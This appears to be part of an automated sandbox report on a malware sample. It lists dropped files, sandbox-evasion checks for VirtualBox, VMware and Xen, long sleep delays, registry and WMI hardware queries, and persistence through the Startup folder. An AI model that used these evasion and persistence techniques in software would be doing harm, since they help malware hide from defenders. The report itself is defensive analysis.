SPINNINGSTORE64 FAILEDSYNC.COND.WAITTEXT FILE BUSYTIME.LOCATION(TIMEENDPERIODTOO MANY LINKSTOO MANY USERSTORRC FILENAMEUNEXPECTED EOFUNKNOWN CODE: UNKNOWN ERROR UNKNOWN METHODUNKNOWN MODE: UNREACHABLE: UNSAFE.POINTERUSERARENASTATEVIRTUALBOX: %WVMWARETRAY.EXEVMWAREUSER.EXEWII LIBNUP/1.0WINAPI ERROR #WINDOW CREATEDWORK.FULL != 0XENSERVICE.EXEZERO PARAMETER WITH GC PROG
Source: 31839b57a4f11171d6abc8bbc4451ee4.exe	Binary or memory string: RTP.EXESYSTEMROOT=SETFILETIMESIGNWRITINGSOFT_DOTTEDSYSTEMDRIVETTL EXPIREDUNINSTALLERVBOXSERVICEVMUSRVC.EXEVARIANTINITVIRTUALFREEVIRTUALLOCKWSARECVFROMWARANG_CITIWHITE_SPACEWINDEFENDER[:^XDIGIT:]\DSEFIX.EXEADDITIONALSALARM CLOCKAPPLICATIONASSISTQUEUEAUTHORITIES

Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 8_2_01092B28 sgdt fword ptr [eax]

8_2_01092B28

Source: C:\Users\user\AppData\Local\Temp\4854.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88D9.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\928F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\C086.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\33A6.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 375	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1136	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1169	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 464	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 395	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 800	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 776	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-T2EVG.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassalac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libmp4v2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassflac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2pcmt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-EH959.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libsox-3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libvorbis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\takdec.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TU4E5.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\tak_deco_lib.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DC7RD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FH8NJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8V27N.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8EMRV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-4LAMA.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L9N3D.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-61EBL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PK4J3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-646RI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-QBH3J.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-8B32G.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DKM5H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libwinpthread-1.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-PFHT1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassopus.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-SA8KK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\peak_scanner_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-S6TO1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\uchardet.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_tta.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-2OL25.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-83LM2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-AEA87.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-EHRNN.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-OJELM.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_RegDLL.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\ff_helper.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\dstt.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libsoxr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-0KP4B.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-T6JUK.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\basscd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\rg_ebur128.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-JVPL3.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\OptimFROG.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-UMGQV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\raw_decode_plugin_c.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N2733.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-N08BV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\utils.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_isdecmp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-4GFMI.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\basswma.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\is-V9NBJ.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-UJ6TD.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\sd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassdsd.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmidi.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\da.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libdtsdec.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-02A0E.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\basswv.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-R8UBV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libFLAC_dynamic.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\opusenc.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\7z.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Dropped PE file which has not been started: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-E8AR2.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\sqlite3.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-9QGCC.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-DS3J7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-458PU.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\libwebp.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\daiso.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Dropped PE file which has not been started: C:\Windows\servicing\Editions\RTFCtrl.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Dropped PE file which has not been started: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-UVLAE.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_ofr.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-L31R1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_fx.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\unins000.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-MHVNS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-058DS.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassmix.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsa984B.tmp.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ClocX\uninst.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bassape.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\dsd2.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-2P3N7.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-TLO0A.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\bass_aac.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\gain_analysis.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-G5GT1.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\lame_enc.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\pcm2dsd.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\etopt.exe	Dropped PE file which has not been started: C:\Program Files (x86)\ClocX\ClocX.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\mp3gain.exe (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\wavpackdll.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-FD1T9.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\plugins\internal\is-CUH2H.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-RFBIV.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\d_writer.dll (copy)	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-LKDFU.tmp\tuc4.tmp	Dropped PE file which has not been started: C:\Program Files (x86)\DataPumpCRT\bin\x86\is-HBK1Q.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\tuc4.exe

Evasive API call chain: GetSystemTime,DecisionNodes

Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\toolspub2.exe	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Users\user\AppData\Local\Temp\is-U9MHE.tmp\tuc4.tmp

API coverage: 7.6 %

Source: C:\Windows\explorer.exe TID: 7512	Thread sleep time: -113600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7508	Thread sleep time: -116900s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7976	Thread sleep time: -46400s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7972	Thread sleep time: -39500s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\4854.exe TID: 7812	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\780F.exe TID: 8060	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\88D9.exe TID: 2084	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5984	Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\928F.exe TID: 7592	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\C086.exe TID: 7008	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe TID: 5916	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\CFAA.exe TID: 7812	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\F38F.exe TID: 2288	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\F38F.exe TID: 1260	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\33A6.exe TID: 4556	Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\33A6.exe TID: 4336	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Program Files (x86)\DataPumpCRT\datapumpcrt.exe

File opened: PhysicalDrive0

Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\F38F.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Users\user\AppData\Local\Temp\F38F.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystem

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
